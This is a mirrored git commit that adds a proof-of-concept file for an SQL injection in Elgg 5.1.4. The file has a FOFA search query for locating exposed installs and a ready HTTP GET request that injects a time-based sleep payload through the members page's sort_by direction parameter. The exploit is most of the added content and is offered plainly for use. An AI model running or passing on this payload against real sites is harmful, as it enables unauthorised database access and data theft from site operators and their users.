mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Merge branch 'main' of https://github.com/wy876/POC
This commit is contained in:
commit
0363ab3b0d
14
Elgg/elgg-sqli.md
Normal file
14
Elgg/elgg-sqli.md
Normal file
@ -0,0 +1,14 @@
|
|||||||
|
## Elgg 5.1.4 Sql Injection
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
icon_hash="413602919"
|
||||||
|
```
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
|
||||||
|
Host:
|
||||||
|
```
|
||||||
|
|
||||||
|
## Ref
|
||||||
|
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
|
||||||
Loading…
x
Reference in New Issue
Block a user